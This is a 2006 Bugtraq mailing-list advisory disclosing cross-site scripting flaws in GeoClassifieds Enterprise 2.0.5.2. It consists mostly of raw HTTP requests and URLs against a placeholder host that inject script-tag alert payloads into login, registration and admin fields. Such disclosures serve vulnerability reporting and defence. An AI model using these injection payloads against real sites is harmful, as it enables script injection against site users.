Home page logo
/

bugtraq logo Bugtraq mailing list archives

GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting
From: securityconnection () gmail com
Date: 27 Jul 2006 05:59:07 -0000

GeoClassifieds Enterprise 2.0.5.2
http://geodesicsolutions.com/products/classifieds/classifieds_enterprise.htm
--------------------------
Cross Site Scripting (XSS)
--------------------------
POST http://target.xx:80/index.php?a=10 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
b[username]="><script>alert(/EllipsisSecurityTest/)</script>&b[password]2=1&submit=1 
---
POST http://target.xx:80/register.php?b=1 HTTP/1.0
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
c[firstname]=1&c[lastname]=1&c[company_name]=1&c[business_type]=1&c[business_type]=1&c[address]=1&c[address_2]=1&c[city]=1&c[zip]=1&c[phone]="><script>alert(/EllipsisSecurityTest/)</script>
---
http://target.xx/index.php?a=11&b=0&c=><script>alert(/EllipsisSecurityTest/)</script>&d=5
http://target.xx/admin/index.php?b[username]=";><script>alert(/EllipsisSecurityTest/)</script>&b[password]=1
-----------------
Ellipsis Security
http://www.ellsec.org


  By Date           By Thread  

Current thread:
  • GeoClassifieds Enterprise <= 2.0.5.2 Cross Site Scripting securityconnection (Jul 27)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault